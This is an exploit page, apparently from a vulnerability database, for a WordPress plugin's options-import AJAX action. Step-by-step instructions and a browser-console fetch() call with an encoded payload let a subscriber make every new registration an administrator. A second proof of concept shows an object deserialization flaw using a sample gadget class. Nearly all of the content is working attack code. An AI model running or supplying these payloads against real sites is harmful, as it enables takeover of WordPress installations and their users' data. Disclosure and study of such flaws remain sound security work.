## https://sploitus.com/exploit?id=WPEX-ID:35C9A954-37FC-4818-A71F-34AAAA0FA3DB
1) Log onto the site as a subscriber
2) Run the following in your browser's console:
```
fetch('/wp-admin/admin-ajax.php', {
method: 'POST',
credentials: "include",
mode: 'cors',
headers: {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
},
body: 'action=ovic_vc_import_options&data=eNoljEEKgCAQXDC_EvsD6xLrtVwndJctNxFMYdcOEf09pevMMIQTPopmRriURd1O2QmHqJUFbERjmx0RPB90peqkJIbOJgTyZ8ytFKpFOmyXLZWQ6fwbg7ByO_lhu4cF7PsBLlEk4w'
})
.then(response => response.text())
.then(data => {
console.log(data);
})
```
3) Log out, and visit /wp-login.php to create a new account, which will automatically be given the `administrator` role.
---
After version 1.2.8, the following POC demonstrates a remaining Admin+ Object Deserialization vulnerability:
1) Ensure that the WP Bakery plugin is installed and activated.
2) Put the following code on the server in order to simulate a malicious gadget chain:
class Evil {
public function __wakeup() : void {
error_log( "[*] Evil object unserialize! BOOM!" );
die( "[*] Evil object unserialize! BOOM!");
}
}
3) Visit the /wp-admin/admin.php?page=ovic-vc-addon page as an admin user.
4) Run the following code in the browser to see the deserialization occur:
fetch(ovic_vc_params.ajaxurl, {
method: 'POST',
credentials: "include",
mode: 'cors',
headers: {
"Content-Type": "application/x-www-form-urlencoded; charset=UTF-8",
},
body: 'action=ovic_vc_import_options&data=eNrztzKxUnIty8xRsjKwqq4FXDAgkQRo'
})
.then(response => response.text())
.then(data => {
console.log(data);
})